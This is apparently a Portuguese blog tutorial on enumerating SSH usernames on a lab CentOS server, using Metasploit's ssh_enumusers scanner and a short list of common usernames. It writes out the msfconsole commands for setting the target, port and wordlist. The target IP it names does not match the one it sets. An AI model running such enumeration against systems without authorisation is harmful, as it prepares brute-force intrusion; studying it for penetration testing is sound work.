Para realizar o teste de enumeração de usuários SSH de um servidor alvo faremos uso de uma ferramenta bem simples do Metasploit que será carregada como um Exploit e de uma wordlist com possíveis nomes de usuários do sistema. Realizaremos o teste analisando as respostas do servidor durante um processo de força bruta, no qual testaremos vários usuários SSH.
Abra inicie o PosgreSQL e o Metasploit Framework
# service postgresql start# msfconsole
Wordlist
Vamos supor que tenhamos uma Wordlist com nomes de usuários comuns como os abaixo:#USERLIST PADRÃO
Administrator
administrator
test
asd
qwerty
matheus
superuser
security
sysadmin
operator
pedro
suporte
sysadmin
support
admin
Manager
manager
monitor
system
sysadm
12345
hello
root
Admin
ADMIN
Carregando os serviços e iniciando o ataque
Agora procure pelo termo ssh para verificar os exploits e auxiliares disponíveis para o termo.msf > search ssh
Esse scanner é um auxiliar de força bruta que tende a testar os logins que estão dentro da uma wordlist
msf > use auxiliary/scanner/ssh/ssh_enumusers
Neste ambiente estarei realizando o ataque sobre um servidor rodando o CentOS 7 cujo IP é o 192.168.0.37
Vamos ver as opções do scanner carregado no Metasploit:
msf > show options
Aqui iremos definir as configurações do exploit
msf > set RHOSTS 192.168.0.102
Obs: O RPORT é por default setado na porta 22, caso você encontre uma porta diferente rodando o serviço de SSH, basta realizar
msf > set RPORT numerodaporta
Definindo a Wordlist
Como já expliicado, você deverá fazer uso de uma wordlist que deverá conter os nomes dos usuários a serem testados. Vamos carregar o caminho até ela no módulo USER_FILEmsf > set USER_FILE /home/matheus/userlist.txt
Agora vamos a ação:
msf > run
Ele vai testar todos os logins que você tem na sua user list um a um e te mostrar os resultados positivos e negativos do teste.
Nenhum comentário